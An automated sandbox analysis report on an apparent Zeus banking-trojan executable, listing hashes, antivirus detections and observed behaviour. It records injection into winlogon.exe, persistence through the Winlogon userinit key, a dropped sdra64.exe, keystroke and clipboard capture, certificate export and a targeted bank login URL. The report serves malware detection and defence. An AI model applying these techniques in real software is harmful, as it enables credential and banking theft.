Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Ue0N2amgcH

Overview

General Information

Sample Name:Ue0N2amgcH (renamed file extension from none to exe)
Analysis ID:381781
MD5:ccb2db4a8a284f62db7002be470ac542
SHA1:b2bdb5ed1ff743117cdf8500a498e247febbb6ec
SHA256:4fb04b099a37aeae2f58685b8fb08bca298f8f68d5dfc45ceb9fa398e9f109ea
Tags:zeus1
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Startup

  • System is w10x64
  • Ue0N2amgcH.exe (PID: 6080 cmdline: 'C:\Users\user\Desktop\Ue0N2amgcH.exe' MD5: CCB2DB4A8A284F62DB7002BE470AC542)
    • winlogon.exe (PID: 560 cmdline: MD5: F9017F2DC455AD373DF036F5817A8870)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
Source: Process startedAuthor: vburov: Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\winlogon.exe, NewProcessName: C:\Windows\System32\winlogon.exe, OriginalFileName: C:\Windows\System32\winlogon.exe, ParentCommandLine: 'C:\Users\user\Desktop\Ue0N2amgcH.exe' , ParentImage: C:\Users\user\Desktop\Ue0N2amgcH.exe, ParentProcessId: 6080, ProcessCommandLine: , ProcessId: 560

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: Ue0N2amgcH.exeAvira: detected
Antivirus detection for dropped fileShow sources
Source: C:\Windows\SysWOW64\sdra64.exeAvira: detection malicious, Label: TR/Dropper.Gen
Multi AV Scanner detection for submitted fileShow sources
Source: Ue0N2amgcH.exeVirustotal: Detection: 90%Perma Link
Source: Ue0N2amgcH.exeReversingLabs: Detection: 100%
Machine Learning detection for dropped fileShow sources
Source: C:\Windows\SysWOW64\sdra64.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: Ue0N2amgcH.exeJoe Sandbox ML: detected
Source: 0.1.Ue0N2amgcH.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
Source: 0.0.Ue0N2amgcH.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_0040DE73 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_0040DE73
Source: Ue0N2amgcH.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_0040A077 PathCombineW,FindFirstFileW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,0_2_0040A077
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_00411039 FindFirstFileW,FindClose,FindFirstFileW,FindClose,CreateMutexW,MoveFileExW,0_2_00411039
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_0040F89A PathCombineW,FindFirstFileW,PathCombineW,PathCombineW,FindNextFileW,FindClose,0_2_0040F89A
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_004040B8 PathCombineW,FindFirstFileW,PathCombineW,WaitForSingleObject,RtlEnterCriticalSection,PathMatchSpecW,PathCombineW,wnsprintfW,WaitForSingleObject,RtlLeaveCriticalSection,Sleep,FindNextFileW,FindClose,0_2_004040B8
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_00406EBD ExpandEnvironmentStringsW,FindFirstFileW,PathRemoveFileSpecW,PathCombineW,FindNextFileW,FindClose,0_2_00406EBD
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_0040B44D RtlAllocateHeap,CreateEventW,InternetQueryOptionA,InternetSetStatusCallback,InternetSetOptionA,InternetReadFileExA,GetLastError,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,ResetEvent,InternetSetOptionA,InternetSetStatusCallback,CloseHandle,InternetQueryOptionA,InternetCrackUrlA,GetSystemTime,wnsprintfW,GetSystemTime,InternetQueryOptionA,GetUrlCacheEntryInfoW,RtlEnterCriticalSection,RtlLeaveCriticalSection,0_2_0040B44D
Source: Ue0N2amgcH.exe, 00000000.00000002.464238365.00000000023F3000.00000004.00000040.sdmpString found in binary or memory: https://onlineeast#.bankofamerica.com/cgi-bin/ias/
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_0040554F GetClipboardData,GlobalFix,GlobalUnWire,0_2_0040554F
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_004056B3 GetTickCount,GetCurrentProcessId,wnsprintfW,GetKeyState,GetKeyState,GetKeyboardState,ToUnicode,WideCharToMultiByte,0_2_004056B3
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_00406C0D NtQueryInformationProcess,CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,NtCreateThread,0_2_00406C0D
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_0040528A NtQueryDirectoryFile,NtQueryObject,lstrcmpiW,0_2_0040528A
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_00409697 CreateFileW,NtQueryObject,lstrcpyW,CloseHandle,0_2_00409697
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_00409CF9 GetProcAddress,LoadLibraryA,GetProcAddress,FreeLibrary,GetForegroundWindow,GetWindowThreadProcessId,OpenProcess,OpenProcessToken,CloseHandle,DuplicateTokenEx,LoadLibraryA,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CreateProcessW,CloseHandle,CloseHandle,0_2_00409CF9
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_0040A16B ExitWindowsEx,0_2_0040A16B
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeFile created: C:\Windows\SysWOW64\sdra64.exeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_004120140_2_00412014
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_0040DFED0_2_0040DFED
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_0040DD800_2_0040DD80
Source: Ue0N2amgcH.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: Ue0N2amgcH.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: sdra64.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.evad.winEXE@1/2@0/0
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_00403DAD CertOpenSystemStoreW,PFXExportCertStore,PFXExportCertStore,GetSystemTime,wnsprintfW,CertDuplicateCertificateContext,CertDeleteCRLFromStore,CertEnumCertificatesInStore,CertCloseStore,0_2_00403DAD
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_0040F0FC OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,0_2_0040F0FC
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_00405808 CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,Process32NextW,FindCloseChangeNotification,0_2_00405808
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMutant created: \Sessions\1\BaseNamedObjects\_AVIRA_21099
Source: Ue0N2amgcH.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Ue0N2amgcH.exeVirustotal: Detection: 90%
Source: Ue0N2amgcH.exeReversingLabs: Detection: 100%
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeFile read: C:\Users\user\Desktop\Ue0N2amgcH.exeJump to behavior

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeUnpacked PE file: 0.2.Ue0N2amgcH.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;.data:W;.reloc:R;.data1:W;
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_004093CD LoadLibraryA,GetProcAddress,0_2_004093CD
Source: initial sampleStatic PE information: section name: .text entropy: 7.30372755134
Source: initial sampleStatic PE information: section name: .text entropy: 7.30372755134
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeFile created: C:\Windows\SysWOW64\sdra64.exeJump to dropped file
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeFile created: C:\Windows\SysWOW64\sdra64.exeJump to dropped file

Boot Survival:

barindex
Creates an undocumented autostart registry key Show sources
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon userinitJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_00407D61 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadCursorW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,0_2_00407D61
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeDropped PE file which has not been started: C:\Windows\SysWOW64\sdra64.exeJump to dropped file
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe TID: 4168Thread sleep count: 193 > 30Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_0040A077 PathCombineW,FindFirstFileW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,0_2_0040A077
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_00411039 FindFirstFileW,FindClose,FindFirstFileW,FindClose,CreateMutexW,MoveFileExW,0_2_00411039
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_0040F89A PathCombineW,FindFirstFileW,PathCombineW,PathCombineW,FindNextFileW,FindClose,0_2_0040F89A
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_004040B8 PathCombineW,FindFirstFileW,PathCombineW,WaitForSingleObject,RtlEnterCriticalSection,PathMatchSpecW,PathCombineW,wnsprintfW,WaitForSingleObject,RtlLeaveCriticalSection,Sleep,FindNextFileW,FindClose,0_2_004040B8
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_00406EBD ExpandEnvironmentStringsW,FindFirstFileW,PathRemoveFileSpecW,PathCombineW,FindNextFileW,FindClose,0_2_00406EBD
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_00405171 LdrGetProcedureAddress,0_2_00405171
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_004093CD LoadLibraryA,GetProcAddress,0_2_004093CD
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeCode function: 0_2_00409475 HeapCreate,GetProcessHeap,RtlAllocateHeap,GetCurrentProcessId,IsBadHugeReadPtr,GetUserDefaultUILanguage,GetUserNameW,0_2_00409475
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processesShow sources
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 400000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 400000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 401000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 412000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 414000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 416000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C940000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C940000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C941000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C952000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C954000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C956000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C960000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C960000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C961000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C972000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C974000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C976000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C980000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C980000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C981000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C992000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C994000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C996000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9A0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9A0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9A1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9B2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9B4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9B6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9C0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9C0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9C1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9D2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9D4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9D6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9E0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9E0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9E1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9F2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9F4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9F6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA12000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA32000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA52000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA72000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA92000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAB2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAD2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAD4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAF2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB12000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB32000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB52000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB61000 protect: page read and writeJump to behavior
